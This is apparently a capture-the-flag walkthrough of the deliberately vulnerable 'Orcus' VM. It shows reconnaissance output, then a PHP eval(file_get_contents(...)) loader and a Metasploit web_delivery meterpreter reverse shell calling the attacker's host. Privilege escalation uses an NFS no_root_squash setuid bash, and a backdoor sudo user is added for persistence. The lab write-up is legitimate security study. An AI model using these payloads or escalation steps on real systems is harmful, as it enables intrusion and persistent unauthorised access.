Hello guys, it’s my third Vulnerable VM by @ViperBlackSkull if you need more information you can reach me on twitter at @marghost. You can get the virtual machine HERE. So lets get started.
This vm is tagged as hard and it is! First i did a nmap
[code languge=”bash”]root@kali:~# nmap -T4 -A -v 192.168.1.21
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-22 13:33 EDT
Discovered open port 443/tcp on 192.168.1.21
Discovered open port 143/tcp on 192.168.1.21
Discovered open port 139/tcp on 192.168.1.21
Discovered open port 995/tcp on 192.168.1.21
Discovered open port 22/tcp on 192.168.1.21
Discovered open port 993/tcp on 192.168.1.21
Discovered open port 445/tcp on 192.168.1.21
Discovered open port 80/tcp on 192.168.1.21
Discovered open port 111/tcp on 192.168.1.21
Discovered open port 53/tcp on 192.168.1.21
Discovered open port 110/tcp on 192.168.1.21
Discovered open port 2049/tcp on 192.168.1.21
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 40370/tcp mountd
| 100005 1,2,3 54899/udp mountd
| 100021 1,3,4 32978/tcp nlockmgr
| 100021 1,3,4 55763/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 08:00:27:60:FE:29 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.4
Uptime guess: 0.048 days (since Wed Mar 22 12:24:55 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel[/code]
Ok so summary we have a webserver a rpc server with nfs and maybe accessible directory. We have two ssh server, this is odd. We have a samba server.
So next step is to nikto this server and see what is going on.
[code]root@kali:~# nikto -h 192.168.1.21
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.21
+ Target Hostname: 192.168.1.21
+ Target Port: 80
+ Start Time: 2017-03-22 16:44:11 (GMT-4)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Entry ‘/exponent.js.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent.js2.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent_bootstrap.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent_constants.php’ in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry ‘/exponent_php_setup.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/exponent_version.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/getswversion.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/login.php’ in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry ‘/overrides.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/selector.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/site_rss.php’ in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry ‘/source_selector.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/thumb.php’ in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry ‘/ABOUT.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/CHANGELOG.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/CREDITS.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/INSTALLATION.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/README.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/RELEASE.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/TODO.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry ‘/files/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry ‘/tmp/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the ‘..’ type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the ‘..’ type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting…
+ OSVDB-3092: /files/: This might be interesting…
+ Uncommon header ‘x-ob_mode’ found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting…
+ OSVDB-3092: : This might be interesting… possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting… has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting…
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time: 2017-03-22 16:44:26 (GMT-4) (15 seconds)
—————————————————————————
+ 1 host(s) tested[/code]
Soooo we have a some portal and phpmyadmin installed. We will see the robot and the readme/changelog/license of the server.
The robots.txt do not help. The readme/license file say to us that we have an install of Exponent CMS and from the changelog we learn that we have the version 2.3.9.
A quick exploit search say that it il vuln from sql injection, but as i go to the index.php i try some and it is not working, i also see that the portal disclame the db is offline so it is a dead end.
The phpmyadmin default login do not work. I searched the other directories that nikto revealed and noting interesting to be found.
So as the creator of the VM invite us to do extended enumeration i will try some other information gathering tools.
So for enumeration sake i will use enum4linux tool to see what i can get
[code]root@kali:~# enum4linux -a -o -n -v 192.168.1.21
Target ……….. 192.168.1.21
RID Range …….. 500-550,1000-1050
Username ……… ”
Password ……… ”
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.21 |
====================================================
[V] Attempting to get domain name with command: nmblookup -A ‘192.168.1.21’
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 192.168.1.21 |
============================================
Looking up status of 192.168.1.21
ORCUS <00> – B <ACTIVE> Workstation Service
ORCUS <03> – B <ACTIVE> Messenger Service
ORCUS <20> – B <ACTIVE> File Server Service
..__MSBROWSE__. <01> – <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> – <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> – B <ACTIVE> Master Browser
WORKGROUP <1e> – <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.168.1.21 |
=====================================
[V] Attempting to make null session using command: smbclient -W ‘WORKGROUP’ //’192.168.1.21’/ipc$ -U”%” -c ‘help’ 2>&1
[+] Server 192.168.1.21 allows sessions using username ”, password ”
===========================================
| Getting domain SID for 192.168.1.21 |
===========================================
[V] Attempting to get domain SID with command: rpcclient -W ‘WORKGROUP’ -U”%” 192.168.1.21 -c ‘lsaquery’ 2>&1
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup
======================================
| OS information on 192.168.1.21 |
======================================
[V] Attempting to get OS info with command: smbclient -W ‘WORKGROUP’ //’192.168.1.21’/ipc$ -U”%” -c ‘q’ 2>&1
[+] Got OS info for 192.168.1.21 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
[V] Attempting to get OS info with command: rpcclient -W ‘WORKGROUP’ -U”%” -c ‘srvinfo’ ‘192.168.1.21’ 2>&1
[+] Got OS info for 192.168.1.21 from srvinfo:
ORCUS Wk Sv PrQ Unx NT SNT Orcus server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 192.168.1.21 |
=============================
[V] Attempting to get userlist with command: rpcclient -W ‘WORKGROUP’ -c querydispinfo -U”%” ‘192.168.1.21’ 2>&1
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc:
[V] Attempting to get userlist with command: rpcclient -W ‘WORKGROUP’ -c enumdomusers -U”%” ‘192.168.1.21’ 2>&1
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]
=========================================
| Share Enumeration on 192.168.1.21 |
=========================================
[V] Attempting to get share list using authentication
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Orcus server (Samba, Ubuntu))
Server Comment
——— ——-
ORCUS Orcus server (Samba, Ubuntu)
Workgroup Master
——— ——-
WORKGROUP ORCUS
[+] Attempting to map shares on 192.168.1.21
[V] Attempting map to share //192.168.1.21/print$ with command: smbclient -W ‘WORKGROUP’ //’192.168.1.21’/’print$’ -U”%” -c dir 2>&1
//192.168.1.21/print$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //192.168.1.21/IPC$ with command: smbclient -W ‘WORKGROUP’ //’192.168.1.21’/’IPC$’ -U”%” -c dir 2>&1
//192.168.1.21/IPC$ Mapping: OK Listing: DENIED
====================================================
| Password Policy Information for 192.168.1.21 |
====================================================
[V] Attempting to get Password Policy info with command: polenum ”:”@’192.168.1.21′ 2>&1
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4[V] Attempting to get Password Policy info with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c "getdompwinfo" 2>&1
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.21 |
==============================
[V] Getting builtin groups with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘enumalsgroups builtin’ 2>&1
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘enumalsgroups domain’ 2>&1
[+] Getting local groups:
[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c "enumdomgroups" 2>&1
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 192.168.1.21 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames administrator’ 2>&1
[V] Assuming that user "administrator" exists
[V] User "administrator" doesn’t exist. User enumeration should be possible, but SID needed…
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames guest’ 2>&1
[V] Assuming that user "guest" exists
[V] User "guest" doesn’t exist. User enumeration should be possible, but SID needed…
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames krbtgt’ 2>&1
[V] Assuming that user "krbtgt" exists
[V] User "krbtgt" doesn’t exist. User enumeration should be possible, but SID needed…
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames domain admins’ 2>&1
[V] Assuming that user "domain admins" exists
[V] User "domain admins" doesn’t exist. User enumeration should be possible, but SID needed…
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames root’ 2>&1
[V] Assuming that user "root" exists
[I] Found new SID: S-1-5-21-2160833340-863236869-394548843
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames bin’ 2>&1
[V] Assuming that user "bin" exists
[I] Found new SID: S-1-22-1
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c ‘lookupnames none’ 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 192.168.1.21 with command: rpcclient -W ‘WORKGROUP’ -U”%” ‘192.168.1.21’ -c lsaenumsid 2>&1
[V] Processing SID S-1-5-32-550
[I] Found new SID: S-1-5-32
[V] Processing SID S-1-5-32-548
[V] Processing SID S-1-5-32-551
[V] Processing SID S-1-5-32-549
[V] Processing SID S-1-5-32-544
[V] Processing SID S-1-1-0
[+] Enumerating users using SID S-1-22-1 and logon username ”, password ”
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username ”, password ”
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2160833340-863236869-394548843 and logon username ”, password ”
S-1-5-21-2160833340-863236869-394548843-501 ORCUS\nobody (Local User)
S-1-5-21-2160833340-863236869-394548843-513 ORCUS\None (Domain Group)
S-1-5-21-2160833340-863236869-394548843-1000 ORCUS\viper (Local User)
S-1-5-21-2160833340-863236869-394548843-1001 ORCUS\root (Local User)[/code]
So we find basic access to samba and rpc and with those we find the users viper root. We found user kippo when enumerating user SID. Looking like a manga name, I will maybe investigate on this.
Dirb with the big dictionary is my next step.
[code]root@kali:~# dirb http://192.168.1.21 /usr/share/wordlists/dirb/big.txt
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Wed Mar 22 17:16:24 2017
URL_BASE: http://192.168.1.21/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
—————–
GENERATED WORDS: 20458
—- Scanning URL: http://192.168.1.21/ —-
==> DIRECTORY: http://192.168.1.21/FCKeditor/
+ http://192.168.1.21/LICENSE (CODE:200|SIZE:15437)
==> DIRECTORY: http://192.168.1.21/admin/
==> DIRECTORY: http://192.168.1.21/backups/
==> DIRECTORY: http://192.168.1.21/cron/
==> DIRECTORY: http://192.168.1.21/external/
==> DIRECTORY: http://192.168.1.21/files/
==> DIRECTORY: http://192.168.1.21/framework/
==> DIRECTORY: http://192.168.1.21/install/
==> DIRECTORY: http://192.168.1.21/javascript/
==> DIRECTORY: http://192.168.1.21/phpmyadmin/
+ http://192.168.1.21/robots.txt (CODE:200|SIZE:1347)
+ http://192.168.1.21/server-status (CODE:403|SIZE:300)
+ http://192.168.1.21/sitemap.xml (CODE:200|SIZE:113)
==> DIRECTORY: http://192.168.1.21/themes/
==> DIRECTORY: http://192.168.1.21/tmp/
+ http://192.168.1.21/webalizer (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.21/zenphoto/
—- Entering directory: http://192.168.1.21/FCKeditor/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)
—- Entering directory: http://192.168.1.21/install/ —-
==> DIRECTORY: http://192.168.1.21/install/changes/
==> DIRECTORY: http://192.168.1.21/install/files/
==> DIRECTORY: http://192.168.1.21/install/images/
==> DIRECTORY: http://192.168.1.21/install/include/
==> DIRECTORY: http://192.168.1.21/install/pages/
==> DIRECTORY: http://192.168.1.21/install/popups/
==> DIRECTORY: http://192.168.1.21/install/samples/
==> DIRECTORY: http://192.168.1.21/install/upgrades/
—- Entering directory: http://192.168.1.21/javascript/ —-
==> DIRECTORY: http://192.168.1.21/javascript/jquery/
—- Entering directory: http://192.168.1.21/phpmyadmin/ —-
—- Entering directory: http://192.168.1.21/zenphoto/ —-
+ http://192.168.1.21/zenphoto/LICENSE (CODE:200|SIZE:18205)
==> DIRECTORY: http://192.168.1.21/zenphoto/albums/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache_html/
==> DIRECTORY: http://192.168.1.21/zenphoto/plugins/
+ http://192.168.1.21/zenphoto/robots.txt (CODE:200|SIZE:471)
==> DIRECTORY: http://192.168.1.21/zenphoto/themes/
==> DIRECTORY: http://192.168.1.21/zenphoto/uploaded/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-data/
—- Entering directory: http://192.168.1.21/zenphoto/zp-core/ —-
+ http://192.168.1.21/zenphoto/zp-core/dataaccess (CODE:200|SIZE:187)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/exif/
+ http://192.168.1.21/zenphoto/zp-core/htaccess (CODE:200|SIZE:546)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/images/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/js/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/locale/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/setup/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/utilities/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/watermarks/
DOWNLOADED: 1575266 – FOUND: 13[/code]
I cleaned it a little and some interesting things where found. the zenphoto directory is an app that let user upload images, interesting for a web_delivery attack. There is a backups directory that nikto didint found the first time. some interesting things are there. SSH credentials that i cant download for now and a zipped file. Lets go and download it. There is a db_conn.php file that contained :
[code]DEFINE (‘DB_USER’, ‘dbuser’);
DEFINE (‘DB_PASSWORD’, ‘dbpassword’);
DEFINE (‘DB_HOST’, ‘localhost’);
DEFINE (‘DB_NAME’, ‘quizdb’);[/code]
So next I will try to login into zenphoto. Ok into zenphoto i did the setup and everyting worked out fine, i could upload a php web_delivery and accessed it via the /zenphoto/albums/ directory.
This is how i made the web_delivery exploit with metasploit :
[code language=”text”]use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
set uripath v9HL33yWdUR4KFo
run[/code]
Created a webdelivery.php file and filled it like this :
[code language=”php”]<?php
eval(file_get_contents(‘http://192.168.1.14:8080/9HL33yWdUR4KFo’));
?>[/code]
After I zipped it and uploaded it with zenphoto. It worked like a charm and when i went to the /zenphoto/albums/ i found my webdelivery.php file. Just opened it and. Then you will be prompted by metasploit to open a session, just log into put the shell command and load bash.
[code language=”text”]sessions -i 1[/code]
[code language=”text”]python -c ‘import pty; pty.spawn("/bin/bash")'[/code]
Now i have a terminal access 😀
And BAM the first flag!
[code][*] Meterpreter session 1 opened (192.168.1.14:4444 -> 192.168.1.21:58000) at 2017-03-22 23:56:38 -0400
sessions -i 1
[*] Starting interaction with 1…
meterpreter > shell
Process 5753 created.
Channel 0 created.
python -c ‘import pty; pty.spawn("/bin/bash")’
www-data@Orcus:/var/www/html/zenphoto/albums/webdelivery-1$ cd /var/www
www-data@Orcus:/var/www$ ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4[/code]
So next i did a linuxprivchecker to search for an escalation exploit.
[code]wget http://www.securitysift.com/download/linuxprivchecker.py
chmod +x linuxprivatechecker.py
python ./linuxprivchecker.py[/code]
I found that the mysql server was vuln, BUT secure_file_priv is activated so no chance to exploit raptor_udf2 with dbuser.
[code]git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git[/code]
Noting to be found here either
[code]git clone https://github.com/rebootuser/LinEnum.git
cd LinEnum
./LinEnum.sh[/code]
First thing i saw is the .youwillfindnothinghere and i was thinking MEH maybe but nooo
[code]cd /home/.youwillfindnothinghere
www-data@Orcus:/home/.youwillfindnothinghere$ ls
ls
itoldyou
www-data@Orcus:/home/.youwillfindnothinghere$ cat itoldyou
cat itoldyou[/code]
PFFFF
But LinEnum found something usefull :
[code]NFS config details:
-rw-r–r– 1 root root 415 Oct 18 19:56 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)[/code]
OH yea no_root_squash. That mean if me as a root upload a file to the server il will not be downgraded as nobody it will stay ‘root’. This can be used to escalate priv.!!
First on kali you need to install nfs-common (wtf kali)
[code]showmount -e 192.168.1.21
Export list for 192.168.1.21:
/tmp *[/code]
As expected
[code]mount -t nfs 192.168.1.22:/tmp /tmpvictim -o nolock[/code]
Into the VM
[code]cp /bin/bash /tmp/bash[/code]
From kali
[code]cp /tmpvictim/bash /tmpvictim/vulnbash
chmod 4777 vulnbash[/code]
Back to the vm just execute
[code]vulnbash -p[/code]
Yesser miller we got root but to make it more stable i will create an user and log into ssh
[code]openssl passwd -crypt test
SSybfm7a0XqFo
useradd -p SSybfm7a0XqFo -s /bin/bash -g 0 groot
usermod -aG sudo groot[/code]
[code]root@kali:/tmpvictim# ssh [email protected]
groot@Orcus:/$ id
uid=1007(groot) gid=0(root) groups=0(root),27(sudo)
groot@Orcus:/$ sudo su
sudo: unable to resolve host Orcus
root@Orcus:/# id
uid=0(root) gid=0(root) groups=0(root)[/code]
Second flag
[code]root@Orcus:~# cat flag.txt
807307b49314f822985d0410de7d8bfe[/code]
I found that what it is making this VM unique. After some search for the user kippo i found earlier, it is the user used by the kippo honeypot. Both last machine didint have an honeypot! So i am going to investigate to find a flag there.
third flag, i found that poking around :
[code]root@Orcus:/etc/kippo# cd data
root@Orcus:/etc/kippo/data# ls
userdb.txt
root@Orcus:/etc/kippo/data# cat userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G![/code]
AND its done!
M.